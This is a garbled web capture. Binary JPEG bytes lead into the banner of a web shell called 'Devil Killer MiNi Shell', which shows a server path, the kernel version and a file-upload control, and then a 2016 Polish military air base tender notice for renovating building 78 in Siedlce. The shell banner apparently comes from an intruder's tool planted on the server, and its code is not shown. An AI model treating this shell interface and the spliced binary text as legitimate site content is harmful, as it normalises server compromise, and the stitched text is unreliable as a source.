JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160830/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160830/303644-N-2016.html

      <div class="divRow_xforms">
         <div>Ogłoszenie nr 303644 - 2016
              z dnia 2016-08-30 r.</div>
         <div style="text-align: center" class="headerMedium_xforms">
            Mińsk Mazowiecki: Remont budynku nr 78 w kompleksiek-0951 JW Siedlce
            <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
         </div>
         <div>
            <b>Zamieszczanie ogłoszenia:</b>
            obowiązkowe
         </div>
         <div>
            <b>Ogłoszenie dotyczy:</b>
            zamówienia publicznego
         </div>
         <div>
            <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <br />
            <b>Nazwa projektu lub programu</b>
            <br />
         </div>
         <div>
            <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br />
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA I: ZAMAWIAJĄCY</u>
         </div>
         <div style="padding-left: 20px">
            <b>Postępowanie przeprowadza centralny zamawiający</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b>
            <br />
            <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br />
            <br />
            <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b>
            <br />
            <b>Informacje dodatkowe:</b>
            <br />
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <b>I. 1) NAZWA I ADRES:</b>
               23 Baza Lotnictwa Taktycznego, krajowy numer identyfikacyjny
              71003764000000, ul.
               
              ,
              05300  
              Mińsk Mazowiecki, woj.
              mazowieckie, państwo
              , tel.
              261 553 505, e-mail
              23blt.przetargi@wp.mil.pl, faks
              261 553 520.
               <br />
               Adres strony internetowej (URL): www.23blt.wp.mil.pl
               <br />
               Adres profilu nabywcy:

                www.23blt.wp.mil.pl
               <br />
            </div>
            <div style="text-align: left">
               <b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>
               Inny:
            </div>
            <div style="text-align: left">
               <b>
                  I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA
                  <i>(jeżeli dotyczy)</i>
                  :
               </b>
               <div style="padding-left: 20px">
                  Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                  <br />
               </div>
            </div>
            <div style="text-align: left">
               <b>I.4) KOMUNIKACJA:</b>
               <br />
               <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
               </div>
               <br />
               <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia</b>
               <div style="padding-left: 20px">
                  tak
                  <br />
                  www.23blt.wp.mil.pl
               </div>
               <br />
               <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
               </div>
               <br />
               <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b>
               <br />
               <b>Elektronicznie</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  adres
                  <br />
               </div>
               <br />
               <div style="padding-left: 20px">
                  <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b>
                  <br />
                  nie
                  <br />
                  <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b>
                  <br />
                  tak
                  <br />
                  Inny sposób:
                  <br />
                  pisemnie, za pośrednictwem poczty, kuriera lub osobiście
                  <br />
                  Adres:
                  <br />
                  23 Baza Lotnistwa Taktycznego, 05-300 Mińsk Mazowiecki, Kancelaria Jawna
               </div>
               <br />
               <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                  <br />
               </div>
            </div>
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA II: PRZEDMIOT ZAMÓWIENIA</u>
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <br />
               <b>II.1) Nazwa nadana zamówieniu przez zamawiającego:</b>
               Remont budynku nr 78 w kompleksiek-0951 JW Siedlce
               <br />
               <b>Numer referencyjny:</b>
               Sprawa zp/38/2016
               <br />
               <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b>
               <br />
               <div style="padding-left: 20px; text-align: justify">nie</div>
               <br />
               <b>II.2) Rodzaj zamówienia:</b>
               roboty budowlane
               <br />
               <b>II.3) Informacja o możliwości składania ofert częściowych</b>
               <br />
               Zamówienie podzielone jest na części:
               <br />
               <div style="padding-left: 20px">Nie</div>
               <br />
               <br />
               <b>II.4) Krótki opis przedmiotu zamówienia</b>
               <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i>
               <b>a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
               Przedmiotem zamówienia jest: Remont budynku nr 78- w kompleksie wojskowym K -0951 JW. Siedlce, ul Składowa 39, administrowanego przez 23 BLT Mińsk Mazowiecki.
    3. Szczegółowy opis przedmiotu zamówienia i zakres zawiera Specyfikacja Techniczna Wykonania i Odbioru robót załącznik nr 4 , oraz przedmiar robót załącznik nr 5 do SIWZ i są jej integralną częścią.
    4. Wszystkie wskazane w opisie przedmiotu zamówienia nazwy własne materiałów z zastosowaniem znaków towarowych, określenie norm, aprobat, specyfikacji technicznych i systemów odniesienia, należy rozumieć jako określenie wymaganych parametrów, właściwości i standardów jakościowych oraz technicznych, a Zamawiający dopuszcza zastosowanie rozwiązań równoważnych o parametrach nie niższych niż określone w opisie przedmiotu zamówienia. Wykonawca, który powołuje się na  rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez  Zamawiającego zgodnie z art. 30 ust. 5 ustawy Pzp.
    5. Zamawiający nie dopuszcza możliwości składania ofert częściowych z zastrzeżeniem, że oferta musi obejmować cały przedmiot zamówienia.
    6. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
    7. Wykonawca zobowiązany jest zrealizować zamówienia na zasadach i warunkach opisanych we wzorze umowy stanowiącym  załącznik  nr 3 do SIWZ.
    8. Zamawiający zaprasza Wykonawców do wzięcia udziału w zebraniu wykonawców (podstawa: art. 38 ust. 3 ustawy Prawo zamówień publicznych):
    - Przedmiotem zebrania będzie przeprowadzenie wizji lokalnej.
    - Zamawiający wyznacza termin zebrania, na dzień 07.09.2016 r. o godz. 11:00.
    - Miejsce zbiórki: Biuro Przepustek JW. Siedlce, ul. Składowa 39. Osoby przybyłe na miejsce zbiórki zobowiązane są do posiadania aktualnego dowodu tożsamości (do celu wydania przepustki).
    - Koszty uczestnictwa w zebraniu wykonawców ponoszą uczestnicy.
    9. Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia na  roboty budowlane .
    10. Zamawiający wymaga zatrudnienia, przez wykonawcę lub podwykonawcę, na podstawie umowy o pracę, minimum sześciu pracowników realizujących roboty ogólnobudowlane, w zakresie realizacji przedmiotu zamówienia. Przez sformułowanie "pracownik" rozumie się osobę zatrudnioną na podstawie umowy o pracę, w rozumieniu przepisów ustawy z dnia 26 czerwca 1974r.  Kodeks pracy (Dz. U. z 2014r., poz. 1502 z późn. zm.).
    11. Każdy Wykonawca może złożyć tylko jedną ofertę.
    12. Oferty nie zawierające pełnego przedmiotu zamówienia zostaną odrzucone.
               <br />
               <br />
               <b>II.5) Główny kod CPV:</b>
               45000000-7
               <br />
               <br />
               <b>II.6) Całkowita wartość zamówienia</b>
               <i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>
               :
               <br />
               Wartość bez VAT:
               <br />
               Waluta:
               <br />
               <div style="padding-left: 20px">
                  <br />
                  <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i>
               </div>
               <br />
               <b>II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:</b>
               nie
               <br />
               <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b>
               <div style="padding-left: 20px">
                  Okres w dniach: 60
                  <br />
               </div>
               <br />
               <b>II.9) Informacje dodatkowe:</b>
            </div>
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</u>
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <b>III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU</b>
               <br />
               <div style="padding-left: 20px">
                  <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b>
                  <br />
                  Określenie warunków:
                
    Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
                  <br />
                  Informacje dodatkowe
                  <br />
                  <b>III.1.2)  Sytuacja finansowa lub ekonomiczna</b>
                  <br />
                  Określenie warunków:
                
    Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
                  <br />
                  Informacje dodatkowe
                  <br />
                  <b>III.1.3) Zdolność techniczna lub zawodowa</b>
                  <br />
                  Określenie warunków:
                
    Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami, posiadającymi odpowiednie uprawnienia i kwalifikacje:
    - uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w branży elektroenergetycznej
    - aktualne świadectwa kwalifikacyjne do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku dozoru ,,D do 1kV lub wyższe
    - aktualne świadectwa kwalifikacyjne do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji  ,,E do 1kV lub wyższe
                  <br />
                  Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                  <br />
                  Informacje dodatkowe:
               </div>
               <b>III.2) PODSTAWY WYKLUCZENIA</b>
               <br />
               <div style="padding-left: 20px">
                  <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b>
                  <br />
                  <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                  <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                  <br />
               </div>
               <b>III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI</b>
               <br />
               <div style="padding-left: 20px">
                  <b>Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu</b>
                  <br />
                  tak
                  <br />
                  <b>Oświadczenie o spełnianiu kryteriów selekcji</b>
                  <br />
                  nie
               </div>
               <b>III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:</b>
               <br />
               <div style="padding-left: 20px">odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy. Wykonawca, w terminie 3 dni od zmieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Prawo zamówień publicznych, przekaże zmawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy. Wraz ze złożonym oświadczeniem, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</div>
               <b>III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP</b>
               <br />
               <div style="padding-left: 20px">
                  <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b>
                  <br />
                  <br />
                  <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b>
                  <br />
               </div>
               <b>III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP</b>
               <br />
               <div style="padding-left: 20px" />
               <b>III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)</b>
               <div style="padding-left: 20px" />
            </div>
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA IV: PROCEDURA</u>
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <b>IV.1) OPIS</b>
               <br />
               <b>IV.1.1) Tryb udzielenia zamówienia:</b>
               przetarg nieograniczony
               <br />
               <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b>
               <div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />
                  1. Oferta musi być zabezpieczona wadium w wysokości 4 000,00 (słownie złotych: cztery tysiące złotych)
    2. Wadium można wnieść w formie:
    a) pieniądzu;
    b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
    c) gwarancjach bankowych;
    d) gwarancjach ubezpieczeniowych;
    e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).
    3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego:
    85 1010 1010 0002 4413 9120 0000 odpowiednio z dopiskiem: Wadium - Sprawa ZP/38/2016  Remont budynku nr 78 w kompleksie K 0951 Siedlce.
    4. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym zamawiającego, o którym mowa w pkt 3, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).
    5. Z treści gwarancji/poręczenia musi wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty zamawiającego pełnej kwoty wadium, w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Pzp.
    6. W przypadku wniesienia wadium w innej formie niż pieniądz Wykonawca dołącza do oferty kopię dokumentu stwierdzającego wniesienie wadium potwierdzoną za zgodność z oryginałem i załącza oryginał tego dokumentu w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia oferty.
    7. Zamawiający zwróci lub zatrzyma wadium zgodnie z postanowieniami art. 46 ustawy Prawo zamówień publicznych.
    8. W przypadku braku wniesienia wadium lub wniesienia go nieskutecznie, zamawiający odrzuci ofertę wykonawcy
               </div>
               <br />
               <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b>
               <div style="padding-left: 20px">nie</div>
               <br />
               <b>IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                  <br />
                  nie
                  <br />
                  Informacje dodatkowe:
                  <br />
               </div>
               <br />
               <b>IV.1.5.) Wymaga się złożenia oferty wariantowej:</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  Dopuszcza się złożenie oferty wariantowej
                  <br />
                  nie
                  <br />
                  Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                  <br />
                  nie
               </div>
               <br />
               <b>IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</b>
               <br />
               <i>(przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)</i>
               <div style="padding-left: 20px">
                  Liczba wykonawców  
                  <br />
                  Przewidywana minimalna liczba wykonawców
                  <br />
                  Maksymalna liczba wykonawców  
                  <br />
                  Kryteria selekcji wykonawców:
                  <br />
               </div>
               <br />
               <b>IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:</b>
               <div style="padding-left: 20px">
                  Umowa ramowa będzie zawarta:
                  <br />
                  <br />
                  Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                  <br />
                  nie
                  <br />
                  Informacje dodatkowe:
                  <br />
                  <br />
                  Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                  <br />
                  nie
                  <br />
                  Informacje dodatkowe:
                  <br />
                  <br />
                  W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                  <br />
                  nie
                  <br />
                  Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                  <br />
                  nie
               </div>
               <br />
               <b>IV.1.8) Aukcja elektroniczna</b>
               <br />
               <b>Przewidziane jest przeprowadzenie aukcji elektronicznej</b>
               <i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem)</i>
               nie
               <br />
               <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej:</b>
               <br />
               <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b>
               <br />
               nie
               <br />
               Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
               <br />
               Informacje dotyczące przebiegu aukcji elektronicznej:
               <br />
               Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień):
               <br />
               Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
               <br />
               Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej:
               <br />
               Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania:
               <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table>
                     <tr>
                        <td>etap nr</td>
                        <td>czas trwania etapu</td>
                     </tr>
                     <tr>
                        <td />
                        <td />
                     </tr>
                  </table>
                  <br />
                  Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                  <br />
                  Warunki zamknięcia aukcji elektronicznej:
                  <br />
               </div>
               <br />
               <b>IV.2) KRYTERIA OCENY OFERT</b>
               <br />
               <b>IV.2.1) Kryteria oceny ofert:</b>
               <br />
               <b>IV.2.2) Kryteria</b>
               <br />
               <div style="padding-left: 20px">
                  <table>
                     <tr>
                        <td>
                           <i>Kryteria</i>
                        </td>
                        <td>
                           <i>Znaczenie</i>
                        </td>
                     </tr>
                     <tr>
                        <td>Cena</td>
                        <td>60</td>
                     </tr>
                  </table>
               </div>
               <br />
               <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp</b>
               (przetarg nieograniczony)
               <br />
               nie
               <br />
               <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne</b>
               <br />
               <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b>
               <br />
               Minimalne wymagania, które muszą spełniać wszystkie oferty:
               <br />
               <br />
               Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
               <br />
               Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
               <br />
               Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
               <br />
               <br />
               Informacje dodatkowe
               <br />
               <br />
               <br />
               <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b>
               <br />
               Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
               <br />
               <br />
               Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
               <br />
               <br />
               Wstępny harmonogram postępowania:
               <br />
               <br />
               Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
               <br />
               Należy podać informacje na temat etapów dialogu:
               <br />
               <br />
               <br />
               Informacje dodatkowe:
               <br />
               <br />
               <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b>
               <br />
               Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
               <br />
               <br />
